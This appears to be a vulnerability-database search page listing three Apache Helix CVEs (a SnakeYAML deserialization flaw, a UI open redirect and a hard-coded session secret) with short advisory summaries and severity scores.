Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
ApacheHelix

3 matches found

CVE
CVEadded 2023/07/26 7:52 a.m.292 views

CVE-2023-38647

CVE-2023-38647 describes a deserialization vulnerability in Apache Helix workflow and REST where SnakeYAML can deserialize java.net.URLClassLoader to load a JAR from a URL, and then javax.script.ScriptEngineManager to execute code with that ClassLoader. This unbounded deserialization can likely l...

9.8CVSS9.6AI score0.01515EPSS
CVE
CVEadded 2022/12/19 10:3 a.m.75 views

CVE-2022-47500

CVE-2022-47500 affects the Apache Helix UI component. The issue is an Open Redirect caused by an improperly designed forward component used for UI embedding, impacting all Apache Helix UI releases from 0.8.0 through 1.0.4. The documented remediation is to upgrade to version 1.1.0, which addresses...

6.1CVSS6.2AI score0.01052EPSS
CVE
CVEadded 2024/08/20 10:11 p.m.59 views

CVE-2024-22281

The CVE-2024-22281 entry concerns Apache Helix Front (UI). The vulnerability is caused by a hard-coded secret in the express-session usage, enabling session spoofing via forged cookies across all versions of the Front UI. Public details state that the project is retired and no fix will be release...

7.5CVSS6.5AI score0.00726EPSS